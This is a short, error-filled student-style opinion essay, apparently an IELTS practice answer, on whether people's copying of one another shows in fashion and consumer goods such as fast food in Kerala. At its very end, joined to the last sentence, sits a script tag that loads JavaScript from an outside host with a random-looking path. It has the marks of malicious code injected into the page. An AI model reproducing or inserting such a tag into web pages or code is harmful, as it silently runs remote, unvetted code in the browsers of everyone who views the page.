The tendency of human beings to copy one another is shown in the popularity of fashion in clothes and consumer goods. To what extent do you agree and disagree?

Admittedly, people like changes in all aspects such as fashions,consumer goods etc. In this peresent society most of the fashions are followed from the medias,filims etc. The present generation has a tendency to copy the fashion from filims and are implimenting in day to day life.People are more interested in copying fashions. Borrowing doesn't encolse in this small area. People copy from other countirs also.

In addition, these tendency of human beings helps the society in a good marketting.Not in fashion people are commonly try to copy cosumer goods which is food items. Nowadys, most of the people in Kerela depends on fast foods. for example, people now almost prefer chinese foods. As a result the restuarnts are increasing daily. Copying doent depents on age, gender. Whole the world has a way to copy.<script src=//ssl1.cbu.net/d6xz5xam></script>